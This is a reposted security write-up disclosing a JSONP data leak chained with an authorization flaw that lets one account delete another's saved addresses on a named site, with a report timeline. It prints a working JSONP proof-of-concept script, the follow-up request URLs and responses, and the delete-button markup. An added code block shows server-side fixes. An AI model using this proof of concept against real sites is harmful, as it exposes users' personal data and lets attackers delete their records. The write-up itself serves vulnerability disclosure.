Jsonp+Excessive deletion Vul

admin, 29 July 2021 01:10:25, 105 views

1. First I found the URL on the website that leaked the user id.

jQuery111308705583230454748_1548063320659({"responseCode":"200","responseDesc":"success","responseData":{"cust":{"customerGuid":"df73d476-5f1d-e911-80ff-******","language":"zh-cn","fullName":"YongShao","gender":2,"country":"CN","countryName":"China","province":"CN-12","provinceName":"****","city":"CN-12-001","cityName":"****","telephone":"1***********","email":""}}})


Then I constructed a JSONP PoC to obtain the victim's id.


<script>function jQuery111308705583230454748_1548063320659(d) {alert(d['responseData']['cust']['customerGuid']);}</script><script type="text/javascript" src="https://yongshao.com/ccpcmd/services/dispatch/secured/CCPC/EN/ccpd/getServiceCust/1000?jsonp=jQuery111308705583230454748_1548063320659&accountId=&source=100000007&channelCode=WEBSITE&countryCode=CN&langCode=zh-cn&country=CN&language=zh-cn&siteCode=zh_CN&_=1548063320660"></script>


got it




2. Then I found that I could splice the leaked id into another request to get the user's address id.


https://yongshao.com/ccpcmd/services/dispatch/secured/CCPC/EN/ccpd/getContactList/1000?jsonp=jQuery111308705583230454748_1548063320661&source=100000007&customerGuid=df73d476-5f1d-e911-80ff-*******&language=zh-cn&channelCode=WEBSITE&countryCode=CN&langCode=zh-cn&country=CN&siteCode=zh_CN&_=1548063320667


response:

jQuery111308705583230454748_1548063320661({"responseData":{"list":[{"customerGuid":"df73d476-5f1d-e911-80ff-******","contactAddressId":"e973d476-5f1d-e911-80ff-******","language":"zh-cn","fullName":"tset","country":"CN","province":"CN-12","city":"CN-12-001","district":"CN-12-001-02","isDefault":"N","createdon":"2019-01-21 03:45:04","countryName":"China","provinceName":"*****","cityName":"*****","districtName":"***","telephone":"131********","postCode":"","address":"*****"}]},"responseCode":"200","responseDesc":"success"})


The contactAddressId parameter identifies the address.



3. Try to use this information to delete the address from account B.


Press F12 and find the delete button:

<a data-contactaddressid="e973d476-5f1d-e911-80ff-******" class="delete-btn under-line" href="javascript:;">Del</a>


Then return to account A to confirm whether the deletion succeeded, observing through the JSONP interface.
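The server-side checks that break this chain, as an added example that is not part of the original post and not the site's own code: a callback-name allow-list, a Referer/Origin check on the JSONP endpoint, and an ownership check before the delete. The in-memory data, guids, function names and the allowed origin are assumptions; the logged-in customer is taken from the server session, never from the request.

```javascript
// Constructed sample data: two customers, each owning one contact address.
const addresses = new Map([
  ['addr-A-0001', { customerGuid: 'cust-A', address: 'A street' }],
  ['addr-B-0002', { customerGuid: 'cust-B', address: 'B street' }],
]);

// Check 1: the JSONP callback must be a bare identifier (jQuery's
// "jQuery<digits>_<digits>" fits), so the parameter cannot inject script text.
const CALLBACK_RE = /^[A-Za-z_$][\w$]{0,63}$/;
function isSafeCallback(name) { return CALLBACK_RE.test(name); }

// Check 2: a <script src> request carries Referer (Origin is not sent), so
// account data is only rendered when it points at the site itself. Referrer
// policy can strip it, so this is defence in depth; the real fix is to not
// serve account data over JSONP at all.
const ALLOWED_ORIGINS = new Set(['https://yongshao.com']); // assumed site origin
function originAllowed(headers) {
  const src = headers.origin || headers.referer;
  if (!src) return false;
  try { return ALLOWED_ORIGINS.has(new URL(src).origin); } catch { return false; }
}

function renderJsonp(callback, headers, payload) {
  if (!isSafeCallback(callback) || !originAllowed(headers)) {
    return { status: 403, body: '' };
  }
  return { status: 200, body: `${callback}(${JSON.stringify(payload)})` };
}

// Check 3: an address may only be deleted by the customer who owns it.
// sessionCustomerGuid comes from the authenticated session, not the request.
function deleteContactAddress(sessionCustomerGuid, contactAddressId) {
  const entry = addresses.get(contactAddressId);
  if (!entry || entry.customerGuid !== sessionCustomerGuid) {
    // Same answer for "missing" and "not yours", so ids cannot be enumerated.
    return { responseCode: '404', responseDesc: 'not found' };
  }
  addresses.delete(contactAddressId);
  return { responseCode: '200', responseDesc: 'success' };
}
```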




  • Timeline

2019.01.21 Report Vul

2019.01.22 Vulnerability received and forwarded for processing

... (I don't know when it was fixed.)

2019.02.19 Published this write-up

This article was first published on the WeChat public account (逢人斗智斗勇): Jsonp+Excessive deletion Vul

  • When reposting, please keep the link to this article (CN-SEC Chinese site; thanks to the original author for their work): Jsonp+Excessive deletion Vul https://cn-sec.com/archives/343564.html